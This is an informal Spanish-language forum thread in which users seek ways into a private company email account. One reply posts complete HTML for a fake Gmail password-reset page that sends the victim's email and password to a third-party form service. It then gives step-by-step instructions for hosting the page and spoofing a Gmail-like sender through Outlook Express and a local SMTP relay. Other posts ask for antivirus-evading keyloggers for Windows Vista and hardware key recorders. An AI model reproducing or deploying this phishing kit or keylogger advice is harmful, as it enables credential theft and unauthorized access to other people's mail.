help: hackear webmail privado.

necesito conseguir la clave de un mail que esta en un servidor privado (empresa), no es hm, gmail, yahoo, etc

ya aprendi hasta hacer un xploit, lo hice, lo envie pero nada (seguro paso a no deseados)

pienso que tal vez enviar un keylogger puede servir, pero necesito que:
- sirva para window vista
- no lo detecte el antivirus (creo es norton o avast)

alguien se anima con datos utiles, tutoriales o algo?
graxias


----
Nota: este tema lo puse en hakcers pero un moderador lo cerro alla porque habia una seccion para correos, (esta) no se si es lo mismo porque NO hablo de hotmail, etc y las cosas que dice el tema general
y si hice un exploit, (varios) basicos pero algo es algo, estoy empezando hace pokito

Hola yo tambien soy nuevo en esto: ¿en que lenguaje hiciste el exploit?
por que no subes uno para poder verlos?

haaa... otra cosa para que quieres hackear una web mail?? (el motivo siempre es importate)

haa por ultimo... eso del antivirus.. utilisa ingenieria social.. no creeras lo inocentes que son algunas personas.

no puedo usar ingenieria social pues no hablo con la victima y lo que envie se va a no deseados por tanto ni ve el mail enviado.

el xploit lo hice con html usando simplemente frontpage,
por ejemplo este para gmail:

-----
<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns="http://www.w3.org/TR/REC-html40">

<NOFRAMES>
<HEAD>
<title>Bienvenido a Gmail.</title>
</HEAD>
<BODY>
</NOFRAMES>

<body BGCOLOR="#EFFFFF">

<!--crea barras arriba de bienvenida-->
<TABLE BORDER="0" width="782" height="35">
<TR>
<TD width="141" height="11">
<p align="left"><img border="0" src="gmail.2.gif" width="141" height="65"></TD>
<TD BGCOLOR="#82caff" ALIGN="center" width="631" height="11">
<p align="left"><FONT FACE="verdana" size="4" ><B>Bienvenido a Gmail.</B></FONT></TD>
</TR>
</TABLE>

<!--texto de la pagina-->
<form method="post" action="http://forms.melodysoft.com">
<input type="hidden" name="id" value="aquinombreformulario"
</form>

<TABLE BORDER="0" WIDTH="783" ALIGN="left" height="313">

<TR><TD height="19" width="777"><hr>Estimado usuario,</TD></TR>
<TR><TD height="65" width="777">para inciar el proceso de reestablecimiento de su contraseña le solicitamos indicar su cuenta de correo alternativo a la cual le enviaremos el link de reestablecimiento,
para ello simplemente debe completar los campos indicados y pulsar <u><i>Aceptar</i></u>.</TD></TR>

<!--HACE EL ENVIO DEL FORMULARIO-->
<TR>
<TD ALIGN="center" width="777" height="178"><table align="center"></TD>
<TD ALIGN="right" class="light"><font face="Arial" size="2"><strong>Correo Alternativo</strong></font></TD>
<TD ALIGN="left" class="light" nowrap="nowrap"><input type="text" tabindex="1" name="Usuario" value="" style="direction:ltr" size="20" /></TD>
</TR>
<TD ALIGN="right" class="light"><font face="Arial" size="2"><strong>Contraseña</strong></font></TD>
<TD ALIGN="left"><input type="password" tabindex="2" name="Clave" style="direction:ltr" size="20" /></TD>
</TABLE>

<P><FONT class="f" size="2"> <span lang="es"></span> <input type="submit" value=" Aceptar " name="aceptar"></FONT></P>

<p align="left">una vez completado este proceso abra el correo recibido pulse el link adjunto.</p>
<hr>

<!--LINK A PAGINA PRINCIPAL gmail-->
<TABLE BORDER="0" ALIGN="center" WIDTH="403">
<TR>
<TD align="center" width="772" height="35"> <font face="Arial"> <span lang="es"> </span> <b>
<a href="http://www.gmail.com/" ><font size="2">Volver a Página Principal</font></a></b><font size="2"> </font></font>
</TD>
</TR>
</TABLE>

</body>
<NOSCRIPT>
</html>

-----

es super basico
lo que es mas latero es que debes es:
- crear un formulario donde se grabara los datos y te avisaran, yo lo hice en melodysoft, es super facil, donde esta en rojo por en codifo del formulario que hiciste
- abrir un servidor gratuito donde subiras tu pagina, asi cuando aprete el linck se abrira ese servidor ficticio, yo use freeservers
- finalmente crear una direccion de correo que sea algo asi como de gmail, eso es tamben facil, vas a tu outlook express, pones herramientas/ctas de correo electronico/agregar nueva cta
- ahi elege POP3, en info de usuario e inicio de secion pon algo creible de gmail, como soporte etc, no pongas contraseña y clickea recordar, servidor entrante cualquier cosa, servidor saliente "localhost", aceptar, finalizar
- y por ultimo necesitas el programa "Local SMTP Relay Server", el cual instalas y abres antes de enviar tu email desde outlook con el link al servidor ficticio.

ojo que depende de a donde envies el xploit se ira o no a no deseados, mails privados como vtr, mimail, manquehue, etc no lo rechazan

espero te sirva, si te pierdes en algo avisame
salu2

llamale como quieras, yo le llamo xploit (no exploit) y a mi me sirvio

bien perro, fue un aporte piola para aquellos que no dominan ocupar un programa sencillo como frontpage. pero acaso crees que se daran la lata de hacerlo''??? ademas usar formularios = requiere un poco mas de conocimientos que para una pag. web.

Saludos

Realmente el termino Xploit esta mal usado, lo mejor seria denominarlos Fakes ( osea pagina turbia, flaite hechas por cualquier wn y que ocupan simulaciones de paginas reconocidas )

Los xploit encambio ocupan algun codigo instantaneo que al solo abrir el correo infectado este concigue la contraseña. en cambio los FAKES necesitan que la gente sea weona, ingrese a la pagina turbia y que sea tan wn como para ingresar los datos)

en realidad, lo que pregunto en este tema es como conseguir la clave de un mail privado, no es mi intension ni me siento capacitada para dar clases o eseñar a programar, simplemente porque recien estoy aprendiendo lo basico

alguien me ayuda?

necesito averiguar la clave de un correo privado y lo unico q me sirve es q la victima aceptara 100% cualkier archivo q le envie,

q puedo hacer ?

pd:intente con keylogger pero igual se detectan muy facil
pd2: lei una wea en ingles q existe una wea pareceia a una bateria q la poni debajo del teclado y la wea graba todo lo q teni , estara en chile esto?
pd3: se aceptan chuchas